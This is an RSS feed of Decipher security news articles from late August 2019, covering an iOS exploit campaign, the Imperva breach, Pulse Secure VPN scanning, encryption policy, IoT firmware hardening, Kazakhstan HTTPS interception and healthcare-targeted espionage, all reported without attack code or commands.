<![CDATA[Decipher]]> https://decipher.sc Decipher is an independent editorial site that takes a practical approach to covering information security. Through news analysis and in-depth features, Decipher explores the impact of the latest risks and provides informative and educational material for readers curious about how security affects our world. Fri, 30 Aug 2019 00:00:00 -0400 en-us info@decipher.sc (Amy Vazquez) Copyright 2019 3600 <![CDATA[Long-Running Attack Campaign Targeted iPhones]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/long-running-attack-campaign-targeted-iphones https://duo.com/decipher/long-running-attack-campaign-targeted-iphones Fri, 30 Aug 2019 00:00:00 -0400

For at least two years, an unknown group of attackers was using several complex chains of exploits for vulnerabilities in iOS to compromise the iPhones of visitors to a handful of hacked websites and install a piece of malicious software that could steal any information on the device and send real-time location tracking data back to the attackers.

The exploit chains were in use from around the time that iOS10 was released in September 2016 up through the beginning of 2019 and each individual chain worked against the latest, fully patched version of iOS available at the time. Researchers with Google’s Threat Analysis Group discovered the hacked websites that the attackers were using in early 2019 and eventually uncovered the five individual exploit chains. Working with researchers from Google’s Project Zero, the team analyzed the exploits, the attack techniques, the vulnerabilities the exploits targeted, and the victim profiles and pieced together the details of a long-running, expertly crafted campaign targeting iPhone users.

Two of the vulnerabilities that Project Zero discovered were still unpatched at the time, and the team reported the bugs to Apple, which released an out-of-band update for iOS in February to fix them. Interestingly, unlike many campaigns that use zero day vulnerabilities, this campaign didn’t target a small group of users.

“There was no target discrimination; simply visiting the hacked site was enough for the exploit server to attack your device, and if it was successful, install a monitoring implant. We estimate that these sites receive thousands of visitors per week,” Ian Beer of Project Zero wrote in one of a series of detailed posts on the iOS attack campaign.

“TAG was able to collect five separate, complete and unique iPhone exploit chains, covering almost every version from iOS 10 through to the latest version of iOS 12. This indicated a group making a sustained effort to hack the users of iPhones in certain communities over a period of at least two years.”

The attack scenario in this campaign, known as a watering hole attack, is a common one but it’s more often used in lower-level campaigns carried out by cybercrime groups. The technique relies on victims happening upon the hacked sites on their own, rather than being directed to the sites through a spear phishing campaign. The combination of spear phishing, zero day vulnerabilities and exploit chains that work against fully patched iOS devices is more indicative of a nation-state campaign than a cybercrime operation.

The malware that this campaign installed on victims’ devices also was quite sophisticated. It has the ability to access unencrypted messages stored on the device by apps including iMessage and WhatsApp, both of which encrypt messages from end to end. The implant also makes copies of the photos on a victim’s device and the entire contacts database and uploads the contents of the device’s keychain, which contains the victim’s credentials and other sensitive data. In short, the implant is the kind of malware that attackers dream of having on an iPhone.

“All that users can do is be conscious of the fact that mass exploitation still exists and behave accordingly."

“There is no visual indicator on the device that the implant is running. There's no way for a user on iOS to view a process listing, so the implant binary makes no attempt to hide its execution from the system. The implant is primarily focused on stealing files and uploading live location data. The implant requests commands from a command and control server every 60 seconds,” Beer said.

“The implant has access to all the database files (on the victim’s phone) used by popular end-to-end encryption apps like Whatsapp, Telegram and iMessage.”

The implications of this attack campaign are quite interesting. Most campaigns with this level of effort, investment, and expertise are constructed to target a relatively small number of people. That could be a handful of diplomats or political dissidents in a specific country or it could be executives at a few companies in a specific industry. The financial and technical resources needed to develop the exploit chains as well as the implant are significant, which limits the number of groups capable of producing them. This is the kind of work most often associated with intelligence agencies and other nation-state affiliated adversary groups, but those groups typically don’t expend their resources on indiscriminate watering hole attacks.

For people who don’t necessarily fall into a high-risk group, this research underscores the fact that high-level adversaries may not be targeting them specifically, but exploitation is still a possibility.

“Real users make risk decisions based on the public perception of the security of these devices. The reality remains that security protections will never eliminate the risk of attack if you're being targeted. To be targeted might mean simply being born in a certain geographic region or being part of a certain ethnic group,” Beer said.

“All that users can do is be conscious of the fact that mass exploitation still exists and behave accordingly; treating their mobile devices as both integral to their modern lives, yet also as devices which when compromised, can upload their every action into a database to potentially be used against them.”

]]>
<![CDATA[Disinformation Attacks Aren't Just Against Elections]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/disinformation-attacks-aren-t-just-against-elections https://duo.com/decipher/disinformation-attacks-aren-t-just-against-elections Thu, 29 Aug 2019 00:00:00 -0400

Lies proliferate on social media, and it is even harder to sift out truth from fiction when it looks like the message is coming from a real person. Mix in some uncertainty as to whether the falsehood is part of a deliberate campaign to hurt the company or just typical online shenanigans, and it's the beginnings of a security headache.

Dealing with false claims posted on social media or other online platforms falls under online reputation management and is generally the responsibility of marketing or public relations, not traditional security. And while disinformation is getting a lot of attention in security circles, the discussion primarily tends to be in the context of election security. However, hacking social media accounts, or creating fake accounts, to post false messages about a company is absolutely a disinformation campaign and warrants at least some kind of a discussion within the security team.

“We are seeing more instances of individuals and groups using disinformation tactics to target companies, which is much more than a brand issue,” said Cindy Otis, director of analysis at Nisos.

Earlier this week, a Twitter account belonging to an English professor posted that Olive Garden was one of the companies “funding Trump’s election in 2020” and suggested that people should stop going to the restaurant. As is fast becoming common whenever politics and well-known brands collide, Twitter users responded with calls for a boycott. Over a two-day period, the #BoycottOliveGarden received more than 52,500 mentions (including tweets, quote tweets, and retweets) by 48,700 users, and had a reach of 139.4 million and 169.4 million impressions.

The initial message was false.

“We don’t know where this information came from, but it is incorrect. Our company does not donate to presidential candidates,” the restaurant chain posted on its social media channels over and over again, trying to counter the boycott messages. When the speculation switched to the restaurant’s parent company, Olive Garden added, “To clarify, Darden does not donate to federal candidates.”

While this looked like just another day of social media monitoring and political discord on Twitter, there was a twist: the person was not responsible for the initial message.

A Cascade

About a day after the initial message was original posted, the owner of the account said someone had compromised the Twitter account and posted that false detail about Olive Garden. The original message was removed and the account owner tried to set the record straight, but lies spread much more readily on social media than truth. And once a lie gains traction, it is really hard to debunk it.

“Social media posts like this were often the initial stages of a cascade,” said Greg Young, vice-president of cybersecurity at Trend Micro. The more legitimate an account appears, the more likely that the message will get amplified. A compromised account—such as that of an established English professor—is the “perfect seed,” Young said.

While disinformation campaigns frequently rely on a bot army or a network of fake accounts to post and spread the false content, a Massachusetts Institute of Technology research found that false reports get retweeted more by humans than bots. This is the cascade Young mentioned—as the false information percolates through the platform, the legitimate uncompromised accounts increase the campaign momentum as regular people start pushing the content.

“The idea was to get the ball rolling in order for the natural effects of a social network to take the planted message and make it trend,” Young said.

Misinfo-as-a-service

Abusing social media to damage an organization’s reputation is commonly used tactic, and according to Trend Micro’s research on Twitter activity, spreading misinformation is a common service offered in underground and “gray” marketplaces. Researchers identified examples of services offering to post messages by "influential" accounts with thousands of followers and other types of manipulation campaigns in an earlier Trend Micro report on disinformation online.

These offerings can be considered an “outgrowth of existing services such as black hat search engine optimization, click fraud, and the sale of human and bot traffic, Trend Micro wrote at the time.

In this instance, one false tweet was able to reach more than 100 million people. “A coordinated plan to hack multiple accounts to spread disinformation could have more devastating consequences,” Otis said.

Breach Lesson

The Olive Garden incident highlights another important lesson about post-data breach response. The email address associated with the Twitter account responsible for the initial post about the restaurant and the password for that email account were both exposed in an earlier (different) data breach, Otis said. As the information was available in underground forums, there are two possible ways the Twitter account was compromised: the attacker tried the email password and found that the password had been reused, or the attacker had control of the email account (using the exposed credentials) and reset the password using Twitter’s forgot-password mechanism.

It’s not known whether the same password was reused for Twitter, but password reuse continues to be a problem. The original poster admitted having been advised, repeatedly, to change passwords after the email account was compromised, but had not done so. With the recent wave of data breaches, the reminders to change passwords can get annoying, but it is an important first line of defense to keep accounts from getting compromised. Turning on multi-factor authentication boosts the odds even more.

Typically, when victims are told to change their passwords, and to make sure they aren't reusing passwords, the focus is on follow-up attacks against them. Lose control of the email account and bank accounts will be compromised. Personal information leaked means potential for spear phishing attacks. But as this incident shows, the attacker may not care about the owner of the account at all. The account is a way to get ahold of the tools necessary to carry out an attack completely unrelated to the breached victim. In this case, a social media account that can be used to mess with a chain restaurant.

Might be a Coincidence

Earlier in the month, a handful of Twitter accounts circulated a list of popular fast-food restaurants supposedly supporting the re-election campaign. The list didn't get a lot of attention initially, and the Washington Post said the information was incorrect, but the list continued to float around. The fact that Olive Garden was included on that list may just be a coincidence, or it may indicate some kind of an advance effort was underway to lay the groundwork for this kind of a campaign.

It's a cycle. Someone may see a post on social media about a company. If a quick search (usually on the same platform) pulls up other people talking about the same post, as well as older posts that seem to be talking about the same thing, then it gives credibility to what is on the post.

Social media monitoring is a valuable intelligence gathering tool, as security teams can uncover details about ongoing threats and attack indicators buried inside social media posts. Social media posts are often the first indicator when issues are being exploited or a company is being targeted. This also means expanding the definition of disinformation to consider that things posted online can directly impact a company's overall risk, as well.

]]>
<![CDATA[Imperva Discloses Data Breach, Theft of Customer API Keys]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/imperva-discloses-customer-data-breach-theft-of-api-keys https://duo.com/decipher/imperva-discloses-customer-data-breach-theft-of-api-keys Wed, 28 Aug 2019 00:00:00 -0400

Security firm Imperva says that the API keys and SSL certificates of some of the customers who use the company’s Cloud Web Application Firewall were exposed in a recent breach, along with the email addresses and hashed passwords of a larger group of customers.

The company became aware of the breach on August 20 when a third party informed company officials of the problem. The data exposure only affects customers of the Cloud WAF product, which was formerly known as Incapsula, and is limited to customers who had accounts through about two years ago.

“On August 20, 2019, we learned from a third party of a data exposure that impacts a subset of customers of our Cloud WAF product who had accounts through September 15, 2017,” said Chris Hylen, CEO of Imperva.

“We profoundly regret that this incident occurred and will continue to share updates going forward. In addition, we will share learnings and new best practices that may come from our investigation and enhanced security measures with the broader industry. Imperva will not let up on our efforts to provide the very best tools and services to keep our customers and their customers safe.”

Though the exposure of customer email addresses and hashed and salted passwords is problematic, the much larger issue is the exposure of the API keys and SSL certificates. With those in hand, an attacker would privileged access to the target customer’s Cloud WAF installation. That access could allow the attacker to modify rules on the WAF to allow his own traffic or that of other attackers through.

As part of the response to the breach, Imperva officials have forced password resets for all of the affected customers and encouraging them to enable two-factor authentication on their accounts. The 2FA options that Imperva provides include getting passcodes through email or SMS, or using the Google Authenticator app.

The Imperva Cloud WAF is one of a handful of enterprise-class WAFs that are designed to provide protection from web-based attacks through a cloud-based implementation.

]]>
<![CDATA[Attackers Targeting Vulnerability in Pulse Secure VPN]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/attackers-targeting-vulnerability-in-pulse-secure-vpn https://duo.com/decipher/attackers-targeting-vulnerability-in-pulse-secure-vpn Tue, 27 Aug 2019 00:00:00 -0400

Attackers are actively scanning for endpoints running versions of the popular Pulse Secure VPN software that are vulnerable to a critical remotely exploitable vulnerability that was disclosed recently.

There is a publicly available exploit for the bug, and researchers have seen large-scale scanning activity by attackers searching for vulnerable machines. Pulse Secure is an SSL VPN that is used in many enterprise environments and the details of the vulnerability have been public for several weeks now. The weakness allows a remote attacker to read an arbitrary file on a vulnerable system, potentially stealing passwords or other sensitive data. It affects several versions of the Pulse Connect Secure and Pulse Policy Secure software. Pulse Secure posted an initial advisory on the vulnerability in late April, but after researchers discussed the bug at Black Hat in early August, attackers took notice.

“This includes an authentication by-pass vulnerability that can allow an unauthenticated user to perform a remote arbitrary file access on the Pulse Connect Secure gateway. This advisory also includes a remote code execution vulnerability that can allow an authenticated administrator to perform remote code execution on Pulse Connect Secure and Pulse Policy Secure gateways. Many of these vulnerabilities have a critical CVSS score and pose significant risk to your deployment,” the advisory says.

In the last few days, researchers began noticing widespread scans by systems looking for machines that are vulnerable to CVE-2019-11510, the arbitrary file read vulnerability. The attackers typically are trying to get to the file that contains users’ passwords for the VPN.

“On Thursday, August 22, 2019, our honeypots detected opportunistic mass scanning activity from a host in Spain targeting Pulse Secure “Pulse Connect Secure” VPN server endpoints vulnerable to CVE-2019-11510. This arbitrary file reading vulnerability allows sensitive information disclosure enabling unauthenticated attackers to access private keys and user passwords. Further exploitation using the leaked credentials can lead to remote command injection (CVE-2019-11539) and allow attackers to gain access inside the private VPN network,” Troy Mursch of threat intelligence firm Bad Packets said in a post on the scanning activity.

“On Friday, August 23, 2019, our honeypots detected additional mass scanning for CVE-2019-11510 from another host in Spain. In both cases, the exploit activity attempted to download the “etc/passwd” file which contains the usernames associated with the VPN server (not client accounts). A successful “HTTP 200/OK” response to this scan indicates the VPN endpoint is vulnerable to further attacks. Given the ongoing scanning activity, it’s likely the attackers have enumerated all publicly accessible hosts vulnerable to CVE-2019-11510.”

The vulnerability is obviously quite serious on its own, but late last week an exploit for it was published on GitHub, making the situation even more concerning. Pulse Secure has patches available for all of the vulnerable versions, and enterprises should prioritize that fix, given the current scanning and availability of the exploit.

Mursch said Bad Packets did a scan of its own to enumerate vulnerable endpoints and found more than 14,000 systems that were still vulnerable to CVE-2019-11510, more than a third of which are in the United States.

]]>
<![CDATA[Encryption Experts Asked G7 to Set the Right Example]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/encryption-experts-asked-g7-set-right-example https://duo.com/decipher/encryption-experts-asked-g7-set-right-example Tue, 27 Aug 2019 00:00:00 -0400

Prior to the beginning of the G7 summit in France, encryption experts around the world wrote an open letter to G7 leaders asking them to not undermine encryption. While the end of the summit didn’t result in any pro-encryption statements from the G7 leaders, the fact that there weren’t any more calls for lawful access may be a relief.

Lawful access is a legal concept about how governments can intercept or seize information as part of law enforcement or intelligence activity. Some governments want to legally require companies to provide to law enforcement and intelligence agencies access to encrypted content. Even though cryptographers and encryption experts had warned that there isn’t a way to set up encryption so that only “good guys” can read it and “bad guys” can’t, government officials continue to argue that there must be a technical way to make this happen.

The G7 Open Letter was a “call to the G7 and other world leaders not to undermine encrypted services in pursuit of law enforcement access to encrypted content,” said Christine Runnegar, senior director of Internet Trust at the Internet Society. That includes not asking for intentional backdoors in services and products that use encryption, not disclosing vulnerabilities in a timely manner so that they can be patched, disabling encryption where it is turned on by default, and banning/restricting the use of encrypted services.

Insisting on this course of action would undermine the security of digital communication and data, and make everyday activities such as online banking, online shopping, and keeping in touch with friends and family hard to do.

“[Notably,] we ask you to protect and promote strong encryption which is the foundation for our digital economies, digital societies, and interdependent lives,” the experts wrote in the the A Joint Call to World Leaders for a Secure and Trusted Digital Economy. The letter was signed by over 30 global organizations, including the Internet Society, Access Now, Electronic Frontier Foundation, Association for Progressive Communications, and the World Wide Web Foundation.

These are troubling times. The United Kingdom and Australia have passed legislation requiring service providers to be able to hand over to law enforcement the contents of encrypted communications. India wants message traceability for end-to-end encrypted messaging apps. The government of Kazakhstan asked the country’s internet service providers to encourage users to install a government-controlled root certificate on their computers. The United States has long called for lawful access, and Attorney-General William Bar signaled that the Department of Justice is willing to push for lawful access, especially for personal encrypted messaging apps such as WhatsApp.

At the last G7 ministers summit in April, the finance ministers expressed support for law enforcement to have backdoor access to encrypted communications, while acknowledging the importance of “not prohibiting, limiting, or weakening encryption.” The resolution from that summit urged technology companies to “establish lawful access solutions for their products and services, including data that is encrypted,” for law enforcement (and related authorities) to access when necessary (in the case of an investigation, for example), “while ensuring that assistance requested from internet companies is underpinned by the rule of law and due process protection.”

This G7 summit did not release a similar statement.

However, the “Five Eyes” nations—intelligence agencies from the United Kingdom, United States, Australia, Canada, and New Zealand—met in London recently, and echoed the demands for backdoor access (UK’s GCHQ has called it a “ghost protocol”) so that they can investigate serious crimes and acts of terrorism. UK police have claimed that at least one of the people involved in the terror attack on the London Bridge used the encrypted messaging app WhatsApp, but that they are unable to see the contents of the messages.

For the encryption experts, it was critical they reminded the G7 leaders that encryption technologies “protect the integrity and confidentiality of digital data and communications” by securing web browsing, online banking, and critical public services like electricity, elections, hospitals and transportation. The demands for lawful access brings “uncertainty and impact to customers’ buying decisions” because they are wondering who to trust with their data, Runnegar said. The diminished trust in security products and, by extension, the company itself, would have “consequences for tech export markets, jobs, and innovation in the security industry,” Runnegar said.

Just before the G7 leaders met, a coalition of trade groups representing some of the largest technology companies in the United States, Europe, and the Asia-Pacific sent a letter of 12 recommendations on global technology issues. In that letter, which touched upon digital trade, cross-border data flows, tax policy, and AI, the trade groups recommended the G7 enhance cybersecurity by using “risk-based approaches grounded in global, consensus-based, industry-led standards and best practices.” The letter was signed by trade groups such as the Information Technology Industry Council (ITI), Computer & Communications Industry Association, the Communications and Information Network Association of Japan, Software and Information Industry Association, and techUK.

The groups said the member countries should “Oppose measures that force disclosure of source code, algorithms, encryption keys, or other sensitive information as a condition of doing business,” something companies are worried will happen more as countries pass their own laws around encryption.

“Other countries look to the G7 when making their own policies and laws, so what the G7 countries do could be replicated across the world,” Runnegar said. “We are asking leaders to set the right example on encryption.”

]]>
<![CDATA[Data Shows IoT Security is Moving Backward]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/data-shows-iot-security-is-moving-backward https://duo.com/decipher/data-shows-iot-security-is-moving-backward Mon, 26 Aug 2019 00:00:00 -0400

The security of IoT devices has been a running joke for many years, so much so that some researchers have given up trying to point out the weaknesses and get vendors to address the problems. Some vendors have pledged to do better and improve their development practices, but a year-long analysis of the security features in the firmware of 22 IoT device manufacturers found that not only are the vendors not making progress on security, they’re actually going backward.

The study is the work of the Cyber Independent Testing Lab, a small non-profit that performs rigorous testing of the security features and properties of a variety of products and platforms. The team wanted to see how IoT vendors were faring in adding standard hardening features to their firmware binaries, so it developed a special methodology that began with downloading available firmware updates from vendor websites, extracting Linux filesystems from the firmware, and then running each binary through the CITL’s custom analytic tools. The dataset comprises more than 3.3 million individual binaries from nearly 5,000 firmware updates from 22 vendors, including ASUS, D-Link, Belkin, QNAP, and Mikrotik, and goes back as far as 2003.

What the team found is dispiriting, if not surprising: IoT firmware hardening is getting worse rather than better. Firmware updates are more likely to remove binary hardening features than to add them, and overall there hasn’t been any trend in a positive direction for security in the 15 years covered by the CITL dataset.

“The best possibility I can theorize is that a team pulls in a new library that’s helpful with some feature and finds that it won’t build against a binary that has some additional hardening turned on, so someone removes one of the hardening flags and then it works fine so they go with it,” said Parker Thompson, lead engineer at CITL.

“Security testing for binary hardening flags hasn’t reached the state of being a regression test yet.”

The CITL study looked for the presence of a number of possible hardening techniques, such as ASLR, non-executable stacks, and stack guards. These technologies are used to mitigate the effects of certain vulnerabilities and have been in wide use in the desktop and server worlds for many years. They have begun to make their way into IoT device firmware in the last few years, but the CITL data shows that updates often remove one or more of the hardening flags and some updates significantly reduce the overall security of the firmware. For example, one update shipped in 2017 by Ubiquiti for its UAP-HD line of wireless access points removed ASLR altogether and the presence of stack guards went from about 70 percent of binaries to virtually none.

One potential reason for the backward movement could be the size of the development teams for IoT products and the rapid pace of the market’s evolution and expansion.

“If you look at a Windows build through this same lens, it looks completely different. It would have virtually complete coverage for the hardening flags. I’d posit that these are much smaller teams that have much less continuity from one project to the next,” Thompson said.

“They’re rapidly responding to a low-cost, high-volume environment. The hints that I’ve found in the filesystems suggests that these are being developed all over the world with a great amount of variation among the teams.”

“We want to bring all of these common points to light and back it up with our data."

Although IoT devices often are associated with consumer applications, a tremendous amount of IoT gear finds its way into enterprise environments, as well, whether it’s through official purchases or shadow installations by employees. Many of the firmware images the CITL study looked at are from networking devices, which are vital to enterprises and therefore quite valuable for attackers.

“We found major regressions in access points you would ship to enterprises by the crate. When you take these things in aggregate, that’s a very soft target. It’s a very low cost to find an exploit in those,” Thompson said.

“We think this is beyond the pale in what is acceptable, especially considering many of these protections are on by default and the major players have been able to accomplish this. These are not companies that are new to technology. They’re not startups that are bootstrapping and just getting into hardware. But they’re always going to be driven by market forces.”

Along with the removal of various hardening techniques across updates, CITL also discovered a large number of identical binaries that were used by at least two separate vendors. There were more than 3,700 binaries duplicated across more than one vendor, a finding that Thompson said was likely a result of so many vendors using common toolchains and upstream suppliers. That duplication has a two-fold effect: an attractive attack target spread across multiple platforms and also a common path for improvement.

“Improving the security of these common binaries would be the first major move in a positive direction for the entire market,” he said. “We want to bring all of these common points to light and back it up with our data. We want to see where the blind spots are.”

Thompson said he'd like to come back to the study in a year or so to see how things have changed, if at all.

"There's a lot more we'd like to go digging into. We bring data to the table that can help disprove groupthink on these topics," he said.

]]>
<![CDATA[Georgia Supreme Court Considers When Data Breach Victims Can Sue]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/georgia-supreme-court-considers-when-data-breach-victims-can-sue https://duo.com/decipher/georgia-supreme-court-considers-when-data-breach-victims-can-sue Mon, 26 Aug 2019 00:00:00 -0400

The Georgia Supreme Court will weigh in on whether a data breach victim has to suffer actual financial loss before he or she can sue for damages.

When a data breach hits the headlines, the work is just beginning. The organization has to investigate the extent of the breach, identify who was affected, and come up with a plan to fix the issue so that the breach won’t happen again. The executives worry about the prospect of lawsuits and potential regulatory fines. The victims have to set up anti-fraud protections, such as buying identity theft protection, credit monitoring, and credit freeze. They have to scrutinize their financial statements for signs of fraudulent activity or other types of theft. There is very little the individual consumer can do to control the damage.

One way for the victims to hold the organizations responsible is to sue—to bring a class-action lawsuit—for negligence (for the data being stolen and putting them at risk). The courts, however, have been divided on whether or not the data breach victims are allowed to sue if their data has not yet been used fraudulently or if there was no follow-up attack using the stolen information. Some U.S. District Courts have allowed lawsuits against Home Depot, Target, Anthem, and Equifax to proceed. Other courts have dismissed lawsuits because the victims could not show they have been harmed by that particular breach.

“Until that day your life is ruined you get nothing? That is a very odd view of the law.” —Justice Nahmias

The Georgia courts thus far have ruled that victims cannot recover damages—the costs incurred to set up protections—if they could not show injury, and it is the Georgia Supreme Court’s turn to address the question.

On Aug. 20, the Georgia Supreme Court heard oral arguments in a class-action suit related to the June 2016 data breach at Georgia-based medical facility Athens Orthopedic. An attacker going by the name “Dark Overlord” stole personal information including names, addresses, dates of birth, telephone numbers, Social Security numbers, and health insurance details of 200,000 current and former patients. Athens Orthopedic advised victims to place fraud alerts on their credit accounts. The clinic did not provide identity theft morning or any other supporting service as recompense to the victims of the breach.

Three of the victims sued the clinic for negligence and breach of implied contract. The plaintiffs wanted compensation for the fees already paid, and future fees, for credit monitoring and identity theft protection services since they had to obtain them out of concern of what could happen after the data breach. These costs were “classic measures of consequential damages” because they were incurred to mitigate “foreseeable” damages, the plaintiffs argued. The court dismissed the lawsuit in June 2017, and the Georgia Court of Appeals ruled 2-1 that “costs of prophylactic measures” were “not recoverable damages.”

While some of the data was offered for sale on criminal forums and some information was publicly available on text-sharing site Pastebin, the plaintiffs could not point to actual fraudulent activity or theft that occurred as a result of the data breach. The courts said the victims needed to provide evidence of future harm that was not based on speculation. In other words, the plaintiffs would have to show evidence a crime would be committed against them before it happened.

During oral arguments, the Georgia Supreme Court justices asked the clinic’s attorneys about what they expected the patients to do after learning they were part of a data breach. According to the Atlanta-Journal Constitution, Justice Sarah Warren said the “Dark Overlord” showed nefarious intent stealing the information, and Justice Nels Peterson said the patients had a duty to mitigate what could happen next.

Justice David Nahmias asked if a person who was mugged and had their keys stolen should change locks to make sure the mugger didn’t break into the house or office next. He did not seem to think that waiting for people to be victims of identity theft was the answer.

“Until that day your life is ruined you get nothing? That is a very odd view of the law,” Nahmias said, according to the AJC report.

Implications Beyond Georgia

The Georgia Supreme Court is just the last in a long line of courts that have grappled with the question of whether data breach victims can sue before their data is fraudulently used. The U.S. Supreme Court held in Spokeo v Robins that plaintiffs must demonstrate that an “injury in fact” has occurred, but did not clarify whether “risk of future harm” qualified as an injury.

The U.S. Court of Appeals for the Seventh Circuit said in Lewert v PF Chang’s China Bistro that ”all class members should be allowed to show that they spent time and resources tracking down possible fraud, changing automatic charges, and replacing cards as a prophylactic measure.” The U.S. Court of Appeals for the District of Columbia, Third Circuit, Sixth Circuit, and Ninth Circuit have ruled similarly.

The U.S. Court of Appeals for the Fourth Circuit held in Beck v McDonald that plaintiffs “failed to establish a non-speculative, imminent injury-in-fact.” The U.S. Court of Appeals for the Second Circuit, First Circuit and Eighth Circuit have ruled similarly.

How the Georgia Supreme Court decides this case will have broad implications, not just within Georgia, but for other data breach victims elsewhere. The plaintiffs argued during the oral arguments that with increasing number of data breaches, future victims need to know what exactly what their legal rights are, if any, and how they can go about protecting those rights.

“By ruling that the plaintiffs have failed to allege a compensable injury, the message delivered thus far in this case has been that data-breach victims in Georgia have no legal rights, regardless of how careless the defendant’s data security practices may have been,” the plaintiffs’ attorneys argued in their brief.

If the victims cannot hold the breached entity accountable, the attorneys argue, nothing changes. “It [Athens Orthopedic] continues to store the plaintiffs’ personally identifiable information on computer systems that employ the same lax security measures that permitted the hacker to access and steal the plaintiffs’ information,” the attorneys said.

From the breached entity’s standpoint, it is difficult to show that a data breach is directly responsible for the fraudulent charges on the credit card. And ironically, the fact that there are so many data breaches makes it even harder to be able to pinpoint which incident led to fraud. There may also be an expectation that most people already have some kind of identity theft protection, again, because there have been so many breaches already.

The fact that there is confusion on whether data breach victims have to prove actual fraud in order to bring a class-action lawsuit affects enterprise risk assessment and breach response planning, too. Enterprises can’t assess whether they have all the pieces in place to respond effectively in case of a data breach if they can’t properly assess the associated costs of a lawsuit.

The Georgia Supreme Court is expected to return a decision within six months, but it definitely won’t be the final word on the matter. Data breach victims and breached organizations will continue to battle the question in courts for years to come.

]]>
<![CDATA[Google and Mozilla Block Kazakhstan HTTPS Interception]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/google-and-mozilla-block-kazakhstan-https-interception https://duo.com/decipher/google-and-mozilla-block-kazakhstan-https-interception Thu, 22 Aug 2019 00:00:00 -0400

Google and Mozilla have removed trust for a root certificate that the Kazakh government was forcing some citizens to install on their device as a way to intercept and inspect HTTPS traffic to some sites.

The move essentially invalidates the certificate in Chrome and Firefox and means that anyone with the root CA installed in one of those browsers will see a warning message that says the certificate is not trusted.

“We believe this act undermines the security of our users and the web, and it directly contradicts Principle 4 of the Mozilla Manifesto that states, ‘Individuals’ security and privacy on the internet are fundamental and must not be treated as optional’,” Wayne Thayer of Mozilla said.

“To protect our users, Firefox, together with Chrome, will block the use of the Kazakhstan root CA certificate. This means that it will not be trusted by Firefox even if the user has installed it. We believe this is the appropriate response because users in Kazakhstan are not being given a meaningful choice over whether to install the certificate and because this attack undermines the integrity of a critical network security mechanism.”

Google and Mozilla made the decision about a month after the HTTPS interception effort began in Kazakhstan. The interception effort targeted a subset of Internet users in Kazakhstan and it focused on a small number of sites, including Twitter, Facebook, and Google. By forcing people to install the root certificate, the Kazakh government was able to impersonate those sites and decrypt and inspect any traffic going to them from devices with the certificate installed. The technique is commonly used by repressive regimes as a way to keep tabs on citizens’ Internet usage and interests. But HTTPS interception is not just an invasion of privacy for users, it’s also dangerous.

“We will never tolerate any attempt, by any organization—government or otherwise—to compromise Chrome users’ data."

“In my view, and the overwhelming view of my colleagues in the security engineering community, this is a dangerously misguided policy, and will have the effect of making every citizen impacted by this policy less safe. It is difficult enough for the largest technology companies in the world to secure their own central network and certificate infrastructure; the notion that a modestly funded small government with limited technical resources can pull it off is naive, to say the least,” Kenn White, a senior security engineer and director of the Open Crypto Audit Project, said at the time the interception effort began in July.

Google’s Chrome engineering team took the same action Mozilla did, removing trust for the Kazakhstan root CA.

“We will never tolerate any attempt, by any organization—government or otherwise—to compromise Chrome users’ data. We have implemented protections from this specific issue, and will always take action to secure our users around the world,” Parisa Tabriz, senior engineering director for Chrome, said in a statement.

Researchers at the Censored Planet project at the University of MIchigan have been monitoring the interception effort in Kazakhstan since it began and their measurements show that the interception essentially ended on August 7. It would be a simple matter for the Kazakh government to obtain another root certificate and start the effort all over again, but it would also need to go through the process of forcing citizens to install it, too.

]]>
<![CDATA[Deciphering Blackhat]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/deciphering-blackhat https://duo.com/decipher/deciphering-blackhat Wed, 21 Aug 2019 00:00:00 -0400

There are a lot of things you could say about Blackhat. Not many of them are kind. But of all the hacker movies that have been made, it's definitely one. It has many of the elements of a good spy thriller, and there's probably a very solid espionage movie hiding in there somewhere. It also has some pretty realistic hacking scenes, shady CIA operatives, and Thor. It's a lot, but Zoe Lindsey, Peter Baker, and Dennis Fisher are here to break it all down for you.

]]>
<![CDATA[Nation-State Attacks Target Medical Research]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/nation-state-attacks-target-medical-research https://duo.com/decipher/nation-state-attacks-target-medical-research Wed, 21 Aug 2019 00:00:00 -0400

Nation-state attackers from Russia, Vietnam, and China are increasingly targeting hospitals, pharmaceutical companies, and research universities in search of healthcare data, intellectual property, and medical research, FireEye said.

While the bulk of attacks continue to be financially motivated and opportunistic, a growing number of intelligence operations are stealing medical research and medical data belonging to specific individuals, FireEye said in its Beyond Compliance: Cyber Threats and Healthcare report. Many of the attacks have a physical impact, such as ransomware that attempts to halt hospital operations, or disrupting medical devices to harm patients. Healthcare data continues to be valuable: between the last quarter of 2018 and the first quarter of 2019, FireEye analysts found multiple stolen healthcare databases being sold on online criminal marketplaces.

"Actors buying and selling PII and PHI from healthcare institutions and providers in underground marketplaces is very common, and will almost certainly remain so due to this data's utility in a wide variety of malicious activity ranging from identity theft and financial fraud to crafting of bespoke phishing lures," the report said.

A 4.3 GB file of healthcare records stolen from a U.S.-entity, which included patient data, driver’s license information, and insurance details, was available for $2,000. This kind of a file would be valuable for criminals interested in conducting insurance fraud or for those crafting targeted attacks.

Cure for Cancer

Espionage groups frequently focus on intellectual property and cutting-edge research, Chinese espionage groups may be boosting its companies. China has one of the world's fastest-growing pharmaceutical industries.

“Targeting medical research and data from studies may enable Chinese corporations to bring new drugs to market faster than Western competitors,” FireEye said.

FireEye analysts found that groups linked to China also seem particularly interested in stealing cancer research. A Chinese-espionage group targeted researchers at a US-based cancer research center in April with emails loaded with malware referencing a research conference the organization had hosted. APT41 sent spear phishing emails to that same center a year earlier. APT22 is believed to have targeted a single institution over many years. APT10 launched spear-phishing campaigns in 2017 against Japanese entities, and some of the documents used in those campaigns referenced cancer research conferences.

The focus on cancer-related research may be tied to “China’s growing concern over increasing cancer and mortality rates, and the accompanying national health care costs,” FireEye said.

Intelligence operations collect medical data to find information about specific people of interest. The U.S. Department of Justice unsealed an indictment of a Chinese national for the 2015 attack of health insurance company Anthem where information for nearly 79 million people were stolen.

